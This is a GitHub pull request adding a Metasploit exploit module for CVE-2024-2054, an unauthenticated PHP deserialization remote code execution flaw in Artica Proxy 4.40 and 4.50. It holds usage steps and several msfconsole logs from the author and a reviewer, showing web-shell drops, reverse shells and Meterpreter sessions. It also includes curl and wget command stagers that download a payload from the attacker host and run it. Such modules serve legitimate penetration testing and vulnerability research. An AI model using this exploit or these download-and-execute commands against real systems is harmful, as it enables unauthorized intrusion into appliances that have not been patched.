Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Artica Proxy unauthenticated RCE [CVE-2024-2054] #18967

Merged
4 commits merged into from Mar 25, 2024
Merged

Artica Proxy unauthenticated RCE [CVE-2024-2054] #18967

4 commits merged into from Mar 25, 2024

Conversation

h00die-gr3y
Copy link
Contributor

@h00die-gr3y h00die-gr3y commented Mar 15, 2024
edited

A Command Injection vulnerability in Artica Proxy appliance version 4.50 and 4.40 allows remote attackers to run arbitrary commands via unauthenticated HTTP request.
The Artica Proxy administrative web application will de-serialize arbitrary PHP objects supplied by unauthenticated users and subsequently enable code execution as the www-data user.

This module has been tested with:

  • Artica Proxy Appliance 4.50 running in VirtualBox 7.0.14 r161095 (Qt5.15.2)
  • Artica Proxy Appliance 4.40 Service Pack 118 running in VirtualBox 7.0.14 r161095 (Qt5.15.2)

Installation steps to install Artica Proxy appliance

  • Install your favorite virtualization engine (VMware or VirtualBox) on your preferred platform.
  • Here are the installation instructions for VirtualBox on MacOS.
  • Download the Artica Proxy iso image from here.
  • Install the iso image in your virtualization engine.
  • When installed, configure the VM appliance to your needs using the menu options.
  • Boot up the VM and should be able to access the Artica appliance either thru the console, ssh on port 22 or via the webui via https://your_articaproxy_ip:9000.

You are now ready to test the module.

Verification Steps

  • Start msfconsole
  • use exploit/linux/http//artica_proxy_unauth_rce_cve_2024_2054
  • set rhosts <ip-target>
  • set rport <port>
  • set webshell cuckoo
  • set target <0=PHP, 1=Unix Command, 2=Linux Dropper>
  • exploit
  • you should get a reverse shell or Meterpreter session depending on the payload and target settings
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > info

       Name: Artica Proxy Unauthenticated PHP Deserialization Vulnerability
     Module: exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054
   Platform: PHP, Unix, Linux
       Arch: php, cmd, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2024-03-05

Provided by:
  h00die-gr3y <h00die.gr3y@gmail.com>
  Jaggar Henry of KoreLogic Inc.

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   PHP
      1   Unix Command
      2   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/ba
                                        sics/using-metasploit.html
  RPORT      9000             yes       The target port (TCP)
  SSL        true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The Artica Proxy endpoint URL
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host
  WEBSHELL                    no        Set webshell name without extension. Name will be randomly generated if left un
                                        set.


  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on t
                                      he local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT  1981             yes       The local port to listen on.


  When TARGET is not 0:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)

Payload information:

Description:
  A Command Injection vulnerability in Artica Proxy appliance 4.50 and below allows
  remote attackers to run arbitrary commands via unauthenticated HTTP request.
  The Artica Proxy administrative web application will deserialize arbitrary PHP objects
  supplied by unauthenticated users and subsequently enable code execution as the "www-data" user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2024-2054
  https://attackerkb.com/topics/q1JUcEJjXZ/cve-2024-2054
  https://packetstormsecurity.com/files/177482


View the full module info with the info -d command.

Scenarios

Target 0 - PHP native php/meterpreter/reverse_tcp session

msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set webshell cuckoo
webshell => cuckoo
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 0
target => 0
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set rhosts 192.168.201.4
rhosts => 192.168.201.4
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set lhost 192.168.201.8
lhost => 192.168.201.8
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 192.168.201.4
[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php
[*] Meterpreter session 15 opened (192.168.201.8:4444 -> 192.168.201.4:33986) at 2024-03-15 17:46:04 +0000

meterpreter > sysinfo
Computer    : artica-applianc
OS          : Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >

Target 1 - Unix Command cmd/unix/reverse_bash session

msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1
target => 1
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing Unix Command for cmd/unix/reverse_bash
[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php
[*] Command shell session 16 opened (192.168.201.8:4444 -> 192.168.201.4:46286) at 2024-03-15 17:48:40 +0000

uname -a
Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64 GNU/Linux
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Target 2 - Linux Dropper linux/x64/meterpreter/reverse_tcp session

msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2
target => 2
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > exploit

[*] Started reverse TCP handler on 192.168.201.8:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.201.4:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[*] Using URL: http://192.168.201.8:1981/U835crbue3yBo
[*] Client 192.168.201.4 (Wget/1.20.1 (linux-gnu)) requested /U835crbue3yBo
[*] Sending payload to 192.168.201.4 (Wget/1.20.1 (linux-gnu))
[*] Sending stage (3045380 bytes) to 192.168.201.4
[+] Deleted /usr/share/artica-postfix/wizard/cuckoo.php
[*] Meterpreter session 17 opened (192.168.201.8:4444 -> 192.168.201.4:35246) at 2024-03-15 17:50:04 +0000
[*] Command Stager progress - 100.00% done (119/119 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : artica-applianc.domain.tld
OS           : Debian 10.13 (Linux 4.19.0-24-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >

Limitations

No limitations.

@bwatters-r7 bwatters-r7 self-assigned this Mar 19, 2024
@bwatters-r7
Copy link
Contributor 

linux/http/artica_proxy_unauth_rce_cve_2024_2054) > show options

Module options (exploit/linux/http/artica_proxy_unauth_rce_cve_2024_2054):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      9000             yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The Artica Proxy endpoint URL
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host
   WEBSHELL                    no        Web shell name without extension. Name will be randomly generated if left unset.


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machi
                                       ne or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


   When TARGET is not 0:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMMAND  passthru         yes       Use PHP command function (Accepted: passthru, shell_exec, system, exec)


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set rhost 10.5.132.149
rhost => 10.5.132.149
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set lhost 10.5.135.201
lhost => 10.5.135.201
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set verbose true
verbose => true
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > check

[*] Checking if 10.5.132.149:9000 can be exploited.
[+] 10.5.132.149:9000 - The target is vulnerable. Artica version: 4.50
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.5.132.149:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 10.5.132.149
[+] Deleted /usr/share/artica-postfix/wizard/lDzWOvtGleVbow.php
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.149:57776) at 2024-03-19 09:52:39 -0500

meterpreter > sysinfo
Computer    : artica-applianc
OS          : Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter >

@bwatters-r7
Copy link
Contributor 

msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > check

[*] Checking if 10.5.132.149:9000 can be exploited.
[+] 10.5.132.149:9000 - The target is vulnerable. Artica version: 4.50
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.5.132.149:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing PHP for php/meterpreter/reverse_tcp
[*] Sending stage (39927 bytes) to 10.5.132.149
[+] Deleted /usr/share/artica-postfix/wizard/tSDaZTThjo.php
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.149:24978) at 2024-03-25 10:09:52 -0500

meterpreter > sysinfo
Computer    : artica-applianc
OS          : Linux artica-applianc 4.19.0-24-amd64 #1 SMP Debian 4.19.282-1 (2023-04-29) x86_64
Meterpreter : php/linux
meterpreter > getuid
Server username: www-data
meterpreter > exit
[*] Shutting down session: 1

[*] 10.5.132.149 - Meterpreter session 1 closed.  Reason: Died

msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 1
target => 1
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set payload cmd/linux/http/x64/meterpreter_reverse_tcp
payload => cmd/linux/http/x64/meterpreter_reverse_tcp

msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > run

[*] Command to run on remote host: curl -so ./SQUDAvbnx http://10.5.135.201:8080/RByzlSnTzclKDpvXskXIrg; chmod +x ./SQUDAvbnx; ./SQUDAvbnx &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /RByzlSnTzclKDpvXskXIrg
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.5.132.149:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing Unix Command for cmd/linux/http/x64/meterpreter_reverse_tcp
[*] Client 10.5.132.149 requested /RByzlSnTzclKDpvXskXIrg
[*] Sending payload to 10.5.132.149 (curl/7.64.0)
[+] Deleted /usr/share/artica-postfix/wizard/FoTOAPTTwYfabOEl.php
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.149:60510) at 2024-03-25 10:31:14 -0500

meterpreter > sysinfo
Computer     : artica-applianc.domain.tld
OS           : Debian 10.13 (Linux 4.19.0-24-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > exit
[*] Shutting down session: 2

[*] 10.5.132.149 - Meterpreter session 2 closed.  Reason: User exit
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set target 2
target => 2
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > set payload linux/x64/meterpreter_reverse_tcp
payload => linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/artica_proxy_unauth_rce_cve_2024_2054) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 10.5.132.149:9000 can be exploited.
[+] The target is vulnerable. Artica version: 4.50
[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
[*] Using URL: http://10.5.135.201:8080/2i60hq
[*] Generated command stager: ["wget -qO /tmp/oWdbECnj http://10.5.135.201:8080/2i60hq;chmod +x /tmp/oWdbECnj;/tmp/oWdbECnj;rm -f /tmp/oWdbECnj"]
[*] Client 10.5.132.149 (Wget/1.20.1 (linux-gnu)) requested /2i60hq
[*] Sending payload to 10.5.132.149 (Wget/1.20.1 (linux-gnu))
[+] Deleted /usr/share/artica-postfix/wizard/OvyPDrRUqDpELT.php
[*] Meterpreter session 3 opened (10.5.135.201:4444 -> 10.5.132.149:22496) at 2024-03-25 10:32:07 -0500
[*] Command Stager progress - 100.00% done (111/111 bytes)
[*] Server stopped.

meterpreter > sysinfo
Computer     : artica-applianc.domain.tld
OS           : Debian 10.13 (Linux 4.19.0-24-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter >

@bwatters-r7 bwatters-r7 closed this pull request by merging all changes into rapid7:master in e775c7c Mar 25, 2024
@bwatters-r7
Copy link
Contributor

Release Notes

The PR adds a module targeting CVE-2024-2054, a command injection vulnerability in Artica Proxy appliance version 4.50 and 4.40. The exploit allows remote unauthenticated attackers to run arbitrary commands as the www-data user.

@bwatters-r7 bwatters-r7 added rn-modules release notes for new or majorly enhanced modules module labels Mar 26, 2024
@h00die-gr3y h00die-gr3y deleted the artica-proxy-unauth-rce branch March 28, 2024 07:25
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

@cgranleese-r7 cgranleese-r7 cgranleese-r7 left review comments

Assignees

@bwatters-r7 bwatters-r7

Labels
module rn-modules release notes for new or majorly enhanced modules
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@h00die-gr3y @bwatters-r7 @cgranleese-r7